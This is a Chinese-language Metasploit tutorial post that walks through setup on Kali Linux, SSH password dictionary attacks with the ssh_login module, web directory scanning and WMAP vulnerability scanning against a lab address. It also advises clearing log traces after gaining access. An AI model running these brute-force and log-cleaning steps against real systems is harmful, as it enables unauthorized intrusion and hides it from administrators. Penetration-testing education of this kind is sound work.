metasploit-framework, 在渗透测试中广泛使用的一个强大工具和平台,关键它是免费的,多数资源均能在http://www.metasploit.com 站点找到。
Kali Linux中自带了该工具,可在Application -> Exploitation Tools -> metasploit中开启。
或是在命令行中执行:
msfconsole
注意,有些模块需要启用Metasploit Database,以存储获得的大量数据,可通过如下命令来启用:
root@kali-linux:/home/admin# msfdb init
root@kali-linux:/home/admin# systemctl enable postgresql
root@kali-linux:/home/admin# systemctl start postgresql
然后启动msfconsole可见如下:
第一步:信息收集
通过msf内嵌的nmap或其它端口扫描工具等,进行端口扫描,看那些服务是Open,对应的服务进程是什么样的,版本信息等。
如下所示:如此多的开放端口,大丰收,足够玩上一个周的,哦,不是,足以支撑着我把metasploit学习个七七八八。
开胃菜
尝试字典破解一些ssh的用户名和密码
注:靠运气,碰到一些不修改密码或是密码设置非常简单的(当然也依靠前面的信息收集,比如管理员的生日是多少,已经找到的该用户的其它账户信息-----记录密码是一件痛苦的事情,特别对于老年人来说,所以,人们都会下意识的使用同一套密码。)
msf5 > search name:scanner
# 搜索一下,哪些扫描工具可用
msf5 > use auxiliary/scanner/ssh/ssh_login
# 装入ssh_login工具,执行info查看工具说明
msf5 auxiliary(scanner/ssh/ssh_login) > show options
msf5 auxiliary(scanner/ssh/ssh_login) > show missing
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 172.12.0.2
msf5 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /home/admin/sshusername.txt
设置目的主机和使用事先准备好的用户名、密码(username password)字典。
msf5 auxiliary(scanner/ssh/ssh_login) > run
#执行字典破解
进入后,记得消除你的痕迹(日志记录)
cat /var/log/messages
cat /var/log/audit/audit.log
msf5 auxiliary(scanner/ssh/ssh_login) > back
#退出该模块
扫描
Metasploit有很多的扫描工具可使用,通过search name:scanner可查询到。选择时,根据你端口扫描的结果进行加载。
Web站点的目录发现
msf5 > use auxiliary/scanner/http/dir_scanner
msf5 auxiliary(scanner/http/dir_scanner) > set RHOSTS 172.12.0.2
执行后,可见这些目录都是真实存在的,如在浏览器中输入:
WMAP扫描
这是个metasploit内嵌的比较全面的Web应用扫描工具。
msf5 > load wmap
.-.-.-..-.-.-..---..---.
| | | || | | || | || |-'
`-----'`-'-'-'`-^-'`-'
[WMAP 1.5.1] === et [ ] metasploit.com 2012
[*] Successfully loaded plugin: wmap
msf5 >
msf5 > ?
wmap Commands
=============
Command Description
------- -----------
wmap_modules Manage wmap modules
wmap_nodes Manage nodes
wmap_run Test targets
wmap_sites Manage sites
wmap_targets Manage targets
wmap_vulns Display web vulns
添加要扫描的站点
msf5 > wmap_sites -a http://172.12.0.2
添加要扫描的URL
msf5 > wmap_targets -t http://172.12.0.2/app
查看添加的目录
msf5 > wmap_targets -l
测试检查加载的模块
msf5 > wmap_run –t
执行扫描:
msf5 > wmap_run -e
查看扫描结果:
msf5 > wmap_vulns –l
还有很多模块有待研究
页面更新:2024-06-08
本站资料均由网友自行发布提供,仅用于学习交流。如有版权问题,请与我联系,QQ:4156828
© CopyRight 2020-2024 All Rights Reserved. Powered By 71396.com 闽ICP备11008920号-4
闽公网安备35020302034903号